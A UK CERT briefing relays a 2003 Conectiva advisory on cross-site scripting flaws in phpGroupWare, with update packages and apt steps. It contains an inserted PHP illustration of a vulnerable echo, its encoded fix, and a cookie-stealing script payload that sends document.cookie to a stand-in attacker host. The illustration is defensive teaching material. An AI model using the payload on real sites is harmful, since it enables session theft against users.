
UNIRAS Brief - 413/03 - Conectiva - Cross site scripting vulnerabilities in phpgroupware



-----BEGIN PGP SIGNED MESSAGE-----

- ----------------------------------------------------------------------------------
   UNIRAS (UK Govt CERT) Briefing Notice - 413/03 dated 21.07.03  Time: 14:30
   UNIRAS is part of NISCC (National Infrastructure Security Co-ordination Centre)
- ----------------------------------------------------------------------------------
   UNIRAS material is also available from its website at www.uniras.gov.uk and
   information about NISCC is available from www.niscc.gov.uk
- ----------------------------------------------------------------------------------


(NOTICE OF NEW ARRANGEMENTS
 ==========================

 Distribution of UNIRAS briefings is being migrated to a new list server, and
 announcements of enhancements to the service will appear shortly.  Meanwhile,
 recipients may notice changes to mail headers and the routing of messages.
 Authenticity of ALL briefings can be verified using the UNIRAS PGP key.)


Title
=====

Conectiva Security Advisory:

Cross site scripting vulnerabilities in phpgroupware

Detail
======

- -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- - --------------------------------------------------------------------------
CONECTIVA LINUX SECURITY ANNOUNCEMENT
- - --------------------------------------------------------------------------

PACKAGE   : phpgroupware
SUMMARY   : Cross site scripting vulnerabilities
DATE      : 2003-07-16 12:14:00
ID        : CLA-2003:697
RELEVANT
RELEASES  : 7.0, 8, 9

- - -------------------------------------------------------------------------

DESCRIPTION
 phpGroupWare[1] is a web-based groupware suite written in PHP.

 François Sorin discovered[2] several cross-site scripting
 vulnerabilities in phpGroupWare versions <= 0.9.14.003. By
 exploiting these vulnerabilities, a remote attacker can obtain
 sensitive information such as authentication cookies, or change the
 behavior of the victim's browser, by crafting a special URL containing
 JavaScript and having a user click on it.

 This announcement updates phpGroupware to the latest stable version:
 0.9.14.005.
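 The following is an added illustration, not phpGroupWare code and not part
 of the Conectiva advisory. It shows the generic pattern behind a reflected
 cross-site scripting bug of the kind described above: a request parameter
 echoed unencoded into the HTML response, next to the corrected form that
 encodes it for the HTML context. The parameter name "search", the function
 names, the cookie name and the payload are all constructed for this example.

```php
<?php
// Added example (not phpGroupWare's code): reflected XSS pattern and its fix.
// Parameter name, function names, cookie name and payload are constructed.

// Vulnerable pattern: the request parameter is concatenated straight into the
// response. A link such as
//   /search.php?search=<script>...</script>
// executes the attacker's script in the victim's origin once clicked, and
// document.cookie is then readable by that script.
function render_vulnerable(string $query): string
{
    return "<p>Results for: " . $query . "</p>";
}

// Corrected pattern: encode for the HTML text context at the point of output.
// ENT_QUOTES also encodes single quotes, so the same helper is safe for
// attribute values delimited by either quote character.
function render_hardened(string $query): string
{
    $safe = htmlspecialchars($query, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return "<p>Results for: " . $safe . "</p>";
}

// Defence in depth: an HttpOnly session cookie cannot be read by script even
// if an encoding bug slips through. This limits cookie theft only; it does
// not stop the other effects of script running in the victim's session.
function session_cookie_header(string $sessionId): string
{
    return "Set-Cookie: sessionid=" . rawurlencode($sessionId)
        . "; Path=/; HttpOnly; Secure";
}

// Constructed payload standing in for the attacker-controlled URL parameter.
$payload = "<script>document.location='http://attacker.invalid/?c='"
    . "+document.cookie</script>";

echo render_vulnerable($payload), PHP_EOL;
echo render_hardened($payload), PHP_EOL;
echo session_cookie_header('abc123'), PHP_EOL;
```

 Run with "php example.php": the first line reproduces the script tag verbatim,
 the second line contains &lt;script&gt; and &apos; entities instead, so a
 browser renders the payload as text. The encoding must match the output
 context; htmlspecialchars() is correct for HTML text and quoted attributes,
 not for data placed inside a <script> block or a URL.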


SOLUTION
 All phpgroupware users should upgrade.


 REFERENCES:
 1.http://www.phpgroupware.org/
 2.http://www.security-corporation.com/articles-20030702-005.html


UPDATED PACKAGES
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/phpgroupware-0.9.14.005-1U70_2cl.noarch.rpm
ftp://atualizacoes.conectiva.com.br/7.0/SRPMS/phpgroupware-0.9.14.005-1U70_2cl.src.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/phpgroupware-0.9.14.005-1U80_2cl.noarch.rpm
ftp://atualizacoes.conectiva.com.br/8/SRPMS/phpgroupware-0.9.14.005-1U80_2cl.src.rpm
ftp://atualizacoes.conectiva.com.br/9/RPMS/phpgroupware-0.9.14.005-9432U90_2cl.noarch.rpm
ftp://atualizacoes.conectiva.com.br/9/SRPMS/phpgroupware-0.9.14.005-9432U90_2cl.src.rpm


ADDITIONAL INSTRUCTIONS
 The apt tool can be used to perform RPM packages upgrades:

 - run:                 apt-get update
 - after that, execute: apt-get upgrade

 Detailed instructions regarding the use of apt and upgrade examples
 can be found at http://distro.conectiva.com.br/atualizacoes/#apt?idioma=en

- - -------------------------------------------------------------------------
All packages are signed with Conectiva's GPG key. The key and instructions
on how to import it can be found at
http://distro.conectiva.com.br/seguranca/chave/?idioma=en
Instructions on how to check the signatures of the RPM packages can be
found at http://distro.conectiva.com.br/seguranca/politica/?idioma=en

- - -------------------------------------------------------------------------
All our advisories and generic update instructions can be viewed at
http://distro.conectiva.com.br/atualizacoes/?idioma=en

- - -------------------------------------------------------------------------
Copyright (c) 2003 Conectiva Inc.
http://www.conectiva.com

- - -------------------------------------------------------------------------
subscribe: conectiva-updates-subscribe@xxxxxxxxxxxxxxxxxxxxxxxxxxx
unsubscribe: conectiva-updates-unsubscribe@xxxxxxxxxxxxxxxxxxxxxxxxxxx
- -----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQE/FZMK42jd0JmAcZARArtCAJ9chSGIZIPr6f4hzmMu1S4gUnyK6ACfTbHF
yasuzUNEusu4FhIRl77SZMw=
=y1Et
- -----END PGP SIGNATURE-----

- ----------------------------------------------------------------------------------

For additional information or assistance, please contact the HELP Desk by
telephone or Not Protectively Marked information may be sent via EMail to:
uniras@xxxxxxxxxxxx

Office Hours:
Mon - Fri: 08:30 - 17:00 Hrs
Tel: +44 (0) 20 7821 1330 Ext 4511
Fax: +44 (0) 20 7821 1686

Outside of Office Hours:
On Call Duty Officer:
Tel: +44 (0) 20 7821 1330 and follow the prompts

- ----------------------------------------------------------------------------------
UNIRAS wishes to acknowledge the contributions of Conectiva for the information
contained in this Briefing.
- ----------------------------------------------------------------------------------
This Briefing contains the information released by the original author. Some
of the information may have changed since it was released. If the vulnerability
affects you, it may be prudent to retrieve the advisory from the canonical site
to ensure that you receive the most current information concerning that problem.

Reference to any specific commercial product, process, or service by trade
name, trademark manufacturer, or otherwise, does not constitute or imply
its endorsement, recommendation, or favouring by UNIRAS or NISCC.  The views
and opinions of authors expressed within this notice shall not be used for
advertising or product endorsement purposes.

Neither UNIRAS or NISCC shall also accept responsibility for any errors
or omissions contained within this briefing notice. In particular, they shall
not be liable for any loss or damage whatsoever, arising from or in connection
with the usage of information contained within this notice.

UNIRAS is a member of the Forum of Incident Response and Security Teams (FIRST)
and has contacts with other international Incident Response Teams (IRTs) in
order to foster cooperation and coordination in incident prevention, to prompt
rapid reaction to incidents, and to promote information sharing amongst its
members and the community at large.
- ----------------------------------------------------------------------------------
<End of UNIRAS Briefing>
-----BEGIN PGP SIGNATURE-----
Version: PGP 8.0

iQCVAwUBPxvs5opao72zK539AQEWpQP8D2EbS66ZdLg46mW3TVIvqipDJABNeUZ5
LjveoPK9Rw+mGKKVRDPKAGqOyn9nR2Eab9LSGiwkqH2SRaeR3vMDz8EogMK7aSD/
eCwuJZ1h0Xkv4eci5txkgQH0K8ClURpbxLgUBHoVkr/WTHQwneqMLdkITQLdZpAf
QqQqLm+oRHg=
=1SBQ
-----END PGP SIGNATURE-----